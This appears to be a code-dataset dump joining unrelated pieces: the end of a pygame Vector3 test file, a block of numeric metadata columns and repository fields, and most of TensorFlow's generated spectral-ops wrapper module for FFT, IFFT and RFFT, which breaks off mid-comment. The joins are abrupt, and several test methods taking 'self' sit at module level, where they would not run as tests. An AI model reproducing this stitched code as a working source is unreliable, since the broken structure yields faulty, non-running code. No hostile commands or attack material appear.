        self.assertEqual(abs(self.v1.elementwise()), (abs(self.v1.x), abs(self.v1.y), abs(self.v1.z)))
        self.assertEqual(-self.v1.elementwise(), -self.v1)
        self.assertEqual(+self.v1.elementwise(), +self.v1)
        self.assertEqual(bool(self.v1.elementwise()), bool(self.v1))
        self.assertEqual(bool(Vector3().elementwise()), bool(Vector3()))
        self.assertEqual(self.zeroVec.elementwise() ** 0, (1, 1, 1))
        # per-component errors must surface from the proxy
        self.assertRaises(ValueError, lambda : pow(Vector3(-1, 0, 0).elementwise(), 1.2))
        self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
        self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() / 0)
        self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() // 0)
        self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() % 0)
        self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() / self.zeroVec)
        self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() // self.zeroVec)
        self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() % self.zeroVec)
        self.assertRaises(ZeroDivisionError, lambda : 2 / self.zeroVec.elementwise())
        self.assertRaises(ZeroDivisionError, lambda : 2 // self.zeroVec.elementwise())
        self.assertRaises(ZeroDivisionError, lambda : 2 % self.zeroVec.elementwise())
def test_slerp(self):
    """Spherical linear interpolation between two vectors."""
    # Slerp is undefined when either endpoint has zero length.
    self.assertRaises(ValueError, lambda : self.zeroVec.slerp(self.v1, .5))
    self.assertRaises(ValueError, lambda : self.v1.slerp(self.zeroVec, .5))
    self.assertRaises(ValueError,
                      lambda : self.zeroVec.slerp(self.zeroVec, .5))
    steps = 10
    angle_step = self.e1.angle_to(self.e2) / steps
    # Between unit vectors the interpolant stays unit-length and the
    # angle to the start vector grows linearly with the parameter.
    for i, u in ((i, self.e1.slerp(self.e2, i/float(steps))) for i in range(steps+1)):
        self.assertAlmostEqual(u.length(), 1)
        self.assertAlmostEqual(self.e1.angle_to(u), i * angle_step)
    # After the loop `u` holds the final sample (t == 1), i.e. the end vector.
    self.assertEqual(u, self.e2)
    v1 = Vector3(100, 0, 0)
    v2 = Vector3(0, 10, 7)
    radial_factor = v2.length() / v1.length()  # NOTE(review): unused — confirm intent
    # With differing lengths (negative t here), the interpolant's length
    # moves linearly from |v1| to |v2|.
    for i, u in ((i, v1.slerp(v2, -i/float(steps))) for i in range(steps+1)):
        self.assertAlmostEqual(u.length(), (v2.length() - v1.length()) * (float(i)/steps) + v1.length())
    self.assertEqual(u, v2)
    # Degenerate cases: slerp from a vector to itself returns that vector...
    self.assertEqual(v1.slerp(v1, .5), v1)
    self.assertEqual(v2.slerp(v2, .5), v2)
    # ...and exactly opposite vectors are rejected (rotation plane is ambiguous).
    self.assertRaises(ValueError, lambda : v1.slerp(-v1, 0.5))
def test_lerp(self):
    """Linear interpolation between two vectors."""
    # Midpoint between the origin and (10, 10, 10).
    start, end = Vector3(0, 0, 0), Vector3(10, 10, 10)
    self.assertEqual(start.lerp(end, 0.5), (5, 5, 5))
    # Interpolation factors outside [0, 1] are rejected.
    self.assertRaises(ValueError, lambda: start.lerp(end, 2.5))
    # Components interpolate independently; equal components stay fixed.
    start, end = Vector3(-10, -5, -20), Vector3(10, 10, -20)
    self.assertEqual(start.lerp(end, 0.5), (0, 2.5, -20))
def test_spherical(self):
    """Conversion to and from spherical coordinates."""
    v = Vector3()
    # Round trip: to-spherical followed by from-spherical is the identity.
    v.from_spherical(self.v1.as_spherical())
    self.assertEqual(self.v1, v)
    # Unit axes map onto the canonical (r, theta, phi) triples,
    # and scaling only affects the radius.
    self.assertEqual(self.e1.as_spherical(), (1, 90, 0))
    self.assertEqual(self.e2.as_spherical(), (1, 90, 90))
    self.assertEqual(self.e3.as_spherical(), (1, 0, 0))
    self.assertEqual((2 * self.e2).as_spherical(), (2, 90, 90))
    # Malformed coordinate tuples raise TypeError.  Bind each case as a
    # default argument so the lambdas do not share a late-bound variable.
    for bad in ((None, None, None), "abc", (None, 1, 2), (1, 2, 3, 4), (1, 2)):
        self.assertRaises(TypeError, lambda bad=bad: v.from_spherical(bad))
    # Passing three separate arguments instead of one tuple also fails.
    self.assertRaises(TypeError, lambda: v.from_spherical(1, 2, 3))
    v.from_spherical((.5, 90, 90))
    self.assertEqual(v, .5 * self.e2)
def test_inplace_operators(self):
    """Augmented-assignment arithmetic on Vector3."""
    # Scalar multiplication scales every component.
    vec = Vector3(1, 1, 1)
    vec *= 2
    self.assertEqual(vec, (2.0, 2.0, 2.0))
    # Scalar true division divides every component.
    vec = Vector3(4, 4, 4)
    vec /= 2
    self.assertEqual(vec, (2.0, 2.0, 2.0))
    # Subtraction and addition accept plain tuples, component-wise.
    vec = Vector3(3.0, 3.0, 3.0)
    vec -= (1, 1, 1)
    self.assertEqual(vec, (2.0, 2.0, 2.0))
    vec = Vector3(3.0, 3.0, 3.0)
    vec += (1, 1, 1)
    self.assertEqual(vec, (4.0, 4.0, 4.0))
def test_pickle(self):
    """Vectors survive a pickle round trip unchanged."""
    import pickle
    for vec in (Vector2(1, 2), Vector3(1, 2, 3)):
        restored = pickle.loads(pickle.dumps(vec))
        self.assertEqual(restored, vec)
def test_subclass_operation(self):
    """In-place arithmetic keeps working on Vector3 subclasses."""
    class SubVector(pygame.math.Vector3):
        pass

    vec = SubVector(2.0, 2.0, 2.0)
    vec *= 2
    self.assertEqual(vec, (4.0, 4.0, 4.0))
# Run the full vector test suite when executed as a script.
if __name__ == '__main__':
    unittest.main()
| 47.80397
| 137
| 0.566286
| 11,241
| 77,060
| 3.846544
| 0.025443
| 0.116284
| 0.028978
| 0.035107
| 0.927959
| 0.902542
| 0.88478
| 0.857744
| 0.830015
| 0.801869
| 0
| 0.071315
| 0.268129
| 77,060
| 1,611
| 138
| 47.833644
| 0.695362
| 0.018674
| 0
| 0.585263
| 0
| 0
| 0.003056
| 0
| 0
| 0
| 0
| 0
| 0.612632
| 1
| 0.087018
| false
| 0.001404
| 0.004912
| 0.000702
| 0.095439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a8c96ebe85eb549a15b90eb71d719a691ac58bc
| 30,558
|
py
|
Python
|
lesson7.4/tensorflow/python/ops/gen_spectral_ops.py
|
magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda
|
cc226deb7b46852407900f9fec0caf62638defe2
|
[
"MIT"
] | 21
|
2018-12-11T20:07:47.000Z
|
2021-11-08T13:12:32.000Z
|
lesson7.4/tensorflow/python/ops/gen_spectral_ops.py
|
magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda
|
cc226deb7b46852407900f9fec0caf62638defe2
|
[
"MIT"
] | 1
|
2020-07-07T21:30:02.000Z
|
2020-07-08T18:16:03.000Z
|
lesson7.4/tensorflow/python/ops/gen_spectral_ops.py
|
magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda
|
cc226deb7b46852407900f9fec0caf62638defe2
|
[
"MIT"
] | 15
|
2018-12-12T02:32:28.000Z
|
2021-11-05T20:40:10.000Z
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: spectral_ops.cc
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
def _batch_fft(input, name=None):
  r"""Deprecated batched 1-D FFT (op metadata says "Use FFT").

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `complex64`.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"BatchFFT", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("BatchFFT", input=input, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("BatchFFT", flat, attrs, outputs, name)
  out, = outputs
  return out
def _batch_fft2d(input, name=None):
  r"""Deprecated batched 2-D FFT (op metadata says "Use FFT2D").

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `complex64`.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"BatchFFT2D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("BatchFFT2D", input=input,
                                            name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("BatchFFT2D", flat, attrs, outputs, name)
  out, = outputs
  return out
def _batch_fft3d(input, name=None):
  r"""Deprecated batched 3-D FFT (op metadata says "Use FFT3D").

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `complex64`.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"BatchFFT3D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("BatchFFT3D", input=input,
                                            name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("BatchFFT3D", flat, attrs, outputs, name)
  out, = outputs
  return out
def _batch_ifft(input, name=None):
  r"""Deprecated batched 1-D inverse FFT (op metadata says "Use IFFT").

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `complex64`.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"BatchIFFT", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("BatchIFFT", input=input,
                                            name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("BatchIFFT", flat, attrs, outputs, name)
  out, = outputs
  return out
def _batch_ifft2d(input, name=None):
  r"""Deprecated batched 2-D inverse FFT (op metadata says "Use IFFT2D").

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `complex64`.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"BatchIFFT2D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("BatchIFFT2D", input=input,
                                            name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("BatchIFFT2D", flat, attrs, outputs, name)
  out, = outputs
  return out
def _batch_ifft3d(input, name=None):
  r"""Deprecated batched 3-D inverse FFT (op metadata says "Use IFFT3D").

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `complex64`.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"BatchIFFT3D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("BatchIFFT3D", input=input,
                                            name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("BatchIFFT3D", flat, attrs, outputs, name)
  out, = outputs
  return out
def fft(input, name=None):
  r"""Fast Fourier transform.

  Computes the 1-D discrete Fourier transform over the inner-most
  dimension of `input`.  Numpy equivalent: `np.fft.fft`.

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same shape as `input`, with the inner-most
    dimension replaced by its 1-D Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"FFT", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("FFT", input=input, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("FFT", flat, attrs, outputs, name)
  out, = outputs
  return out
def fft2d(input, name=None):
  r"""2-D fast Fourier transform.

  Computes the 2-D discrete Fourier transform over the inner-most two
  dimensions of `input`.  Numpy equivalent: `np.fft.fft2`.

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same shape as `input`, with the inner-most
    two dimensions replaced by their 2-D Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"FFT2D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("FFT2D", input=input, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("FFT2D", flat, attrs, outputs, name)
  out, = outputs
  return out
def fft3d(input, name=None):
  r"""3-D fast Fourier transform.

  Computes the 3-D discrete Fourier transform over the inner-most three
  dimensions of `input`.  Numpy equivalent: `np.fft.fftn` with 3 dimensions.

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same shape as `input`, with the inner-most
    three dimensions replaced by their 3-D Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"FFT3D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("FFT3D", input=input, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("FFT3D", flat, attrs, outputs, name)
  out, = outputs
  return out
def ifft(input, name=None):
  r"""Inverse fast Fourier transform.

  Computes the inverse 1-D discrete Fourier transform over the inner-most
  dimension of `input`.  Numpy equivalent: `np.fft.ifft`.

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same shape as `input`, with the inner-most
    dimension replaced by its inverse 1-D Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"IFFT", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("IFFT", input=input, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("IFFT", flat, attrs, outputs, name)
  out, = outputs
  return out
def ifft2d(input, name=None):
  r"""Inverse 2-D fast Fourier transform.

  Computes the inverse 2-D discrete Fourier transform over the inner-most
  two dimensions of `input`.  Numpy equivalent: `np.fft.ifft2`.

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same shape as `input`, with the inner-most
    two dimensions replaced by their inverse 2-D Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"IFFT2D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("IFFT2D", input=input, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("IFFT2D", flat, attrs, outputs, name)
  out, = outputs
  return out
def ifft3d(input, name=None):
  r"""Inverse 3-D fast Fourier transform.

  Computes the inverse 3-D discrete Fourier transform over the inner-most
  three dimensions of `input`.  Numpy equivalent: `np.fft.ifftn` with 3
  dimensions.

  Args:
    input: A `Tensor` of type `complex64`.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same shape as `input`, with the inner-most
    three dimensions replaced by their inverse 3-D Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert the argument and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    flat = [tensor]
    attrs = None
    outputs = _execute.execute(b"IFFT3D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper("IFFT3D", input=input, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("IFFT3D", flat, attrs, outputs, name)
  out, = outputs
  return out
def irfft(input, fft_length, name=None):
  r"""Inverse real-valued fast Fourier transform.

  Computes the inverse 1-D DFT of a real-valued signal over the inner-most
  dimension of `input`, which is assumed to hold the `fft_length / 2 + 1`
  unique components produced by `RFFT`.  Along that axis the input is
  cropped or zero-padded to match `fft_length / 2 + 1`.  Numpy equivalent:
  `np.fft.irfft`.

  Args:
    input: A `Tensor` of type `complex64`.
    fft_length: An int32 `Tensor` of shape [1], the FFT length.
    name: A name for the operation (optional).

  Returns:
    A float32 `Tensor` of the same rank as `input`, with the inner-most
    dimension replaced by the `fft_length` samples of the inverse 1-D
    Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert both arguments and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
    flat = [tensor, length]
    attrs = None
    outputs = _execute.execute(b"IRFFT", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper(
        "IRFFT", input=input, fft_length=fft_length, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("IRFFT", flat, attrs, outputs, name)
  out, = outputs
  return out
def irfft2d(input, fft_length, name=None):
  r"""Inverse 2-D real-valued fast Fourier transform.

  Computes the inverse 2-D DFT of a real-valued signal over the inner-most
  two dimensions of `input`, which are assumed to be the output of `RFFT2D`
  (the inner-most dimension holding `fft_length / 2 + 1` unique
  components).  Each axis is cropped or zero-padded to its `fft_length`
  entry.  Numpy equivalent: `np.fft.irfft2`.

  Args:
    input: A `Tensor` of type `complex64`.
    fft_length: An int32 `Tensor` of shape [2], the FFT length per dimension.
    name: A name for the operation (optional).

  Returns:
    A float32 `Tensor` of the same rank as `input`, with the inner-most two
    dimensions replaced by the `fft_length` samples of the inverse 2-D
    Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert both arguments and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
    flat = [tensor, length]
    attrs = None
    outputs = _execute.execute(b"IRFFT2D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper(
        "IRFFT2D", input=input, fft_length=fft_length, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("IRFFT2D", flat, attrs, outputs, name)
  out, = outputs
  return out
def irfft3d(input, fft_length, name=None):
  r"""Inverse 3-D real-valued fast Fourier transform.

  Computes the inverse 3-D DFT of a real-valued signal over the inner-most
  three dimensions of `input`, which are assumed to be the output of
  `RFFT3D` (the inner-most dimension holding `fft_length / 2 + 1` unique
  components).  Each axis is cropped or zero-padded to its `fft_length`
  entry.  Numpy equivalent: `np.irfftn` with 3 dimensions.

  Args:
    input: A `Tensor` of type `complex64`.
    fft_length: An int32 `Tensor` of shape [3], the FFT length per dimension.
    name: A name for the operation (optional).

  Returns:
    A float32 `Tensor` of the same rank as `input`, with the inner-most
    three dimensions replaced by the `fft_length` samples of the inverse
    3-D real Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert both arguments and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.complex64)
    length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
    flat = [tensor, length]
    attrs = None
    outputs = _execute.execute(b"IRFFT3D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper(
        "IRFFT3D", input=input, fft_length=fft_length, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("IRFFT3D", flat, attrs, outputs, name)
  out, = outputs
  return out
def rfft(input, fft_length, name=None):
  r"""Real-valued fast Fourier transform.

  Computes the 1-D DFT of a real-valued signal over the inner-most
  dimension of `input`.  Because the DFT of a real signal is
  Hermitian-symmetric, only the `fft_length / 2 + 1` unique components are
  returned.  Along the transformed axis the input is cropped or zero-padded
  to `fft_length`.  Numpy equivalent: `np.fft.rfft`.

  Args:
    input: A `Tensor` of type `float32`.
    fft_length: An int32 `Tensor` of shape [1], the FFT length.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same rank as `input`, with the inner-most
    dimension replaced by the `fft_length / 2 + 1` unique frequency
    components of its 1-D Fourier transform.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert both arguments and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.float32)
    length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
    flat = [tensor, length]
    attrs = None
    outputs = _execute.execute(b"RFFT", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper(
        "RFFT", input=input, fft_length=fft_length, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("RFFT", flat, attrs, outputs, name)
  out, = outputs
  return out
def rfft2d(input, fft_length, name=None):
  r"""2-D real-valued fast Fourier transform.

  Computes the 2-D DFT of a real-valued signal over the inner-most two
  dimensions of `input`.  Only the `fft_length / 2 + 1` unique components
  of the inner-most output dimension are returned (Hermitian symmetry).
  Each axis is cropped or zero-padded to its `fft_length` entry.  Numpy
  equivalent: `np.fft.rfft2`.

  Args:
    input: A `Tensor` of type `float32`.
    fft_length: An int32 `Tensor` of shape [2], the FFT length per dimension.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same rank as `input`, with the inner-most
    two dimensions replaced by their 2-D Fourier transform; the inner-most
    dimension holds `fft_length / 2 + 1` unique frequency components.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert both arguments and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.float32)
    length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
    flat = [tensor, length]
    attrs = None
    outputs = _execute.execute(b"RFFT2D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper(
        "RFFT2D", input=input, fft_length=fft_length, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("RFFT2D", flat, attrs, outputs, name)
  out, = outputs
  return out
def rfft3d(input, fft_length, name=None):
  r"""3-D real-valued fast Fourier transform.

  Computes the 3-D DFT of a real-valued signal over the inner-most three
  dimensions of `input`.  Only the `fft_length / 2 + 1` unique components
  of the inner-most output dimension are returned (Hermitian symmetry).
  Each axis is cropped or zero-padded to its `fft_length` entry.  Numpy
  equivalent: `np.fft.rfftn` with 3 dimensions.

  Args:
    input: A `Tensor` of type `float32`.
    fft_length: An int32 `Tensor` of shape [3], the FFT length per dimension.
    name: A name for the operation (optional).

  Returns:
    A complex64 `Tensor` of the same rank as `input`, with the inner-most
    three dimensions replaced by their 3-D Fourier transform; the
    inner-most dimension holds `fft_length / 2 + 1` unique frequency
    components.
  """
  ctx = _context.context()
  if not ctx.in_graph_mode():
    # Eager path: convert both arguments and run the kernel immediately.
    tensor = _ops.convert_to_tensor(input, _dtypes.float32)
    length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
    flat = [tensor, length]
    attrs = None
    outputs = _execute.execute(b"RFFT3D", 1, inputs=flat, attrs=attrs,
                               ctx=ctx, name=name)
  else:
    # Graph path: record the op in the current graph.
    _, _, op = _op_def_lib._apply_op_helper(
        "RFFT3D", input=input, fft_length=fft_length, name=name)
    outputs = op.outputs[:]
    flat = op.inputs
    attrs = None
  _execute.record_gradient("RFFT3D", flat, attrs, outputs, name)
  out, = outputs
  return out
def _InitOpDefLibrary(op_list_proto_bytes):
  """Parse a serialized OpList, register it, and return an OpDefLibrary.

  Args:
    op_list_proto_bytes: Serialized `OpList` protocol buffer bytes.

  Returns:
    An `OpDefLibrary` populated with the ops from the proto.
  """
  parsed = _op_def_pb2.OpList()
  parsed.ParseFromString(op_list_proto_bytes)
  # Registration makes the op definitions visible to the framework.
  _op_def_registry.register_op_list(parsed)
  library = _op_def_library.OpDefLibrary()
  library.add_op_list(parsed)
  return library
# op {
# name: "BatchFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use FFT"
# }
# }
# op {
# name: "BatchFFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use FFT2D"
# }
# }
# op {
# name: "BatchFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use FFT3D"
# }
# }
# op {
# name: "BatchIFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use IFFT"
# }
# }
# op {
# name: "BatchIFFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use IFFT2D"
# }
# }
# op {
# name: "BatchIFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use IFFT3D"
# }
# }
# op {
# name: "FFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "FFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "FFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IFFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IRFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_FLOAT
# }
# }
# op {
# name: "IRFFT2D"
# input_arg {
# name: "input"
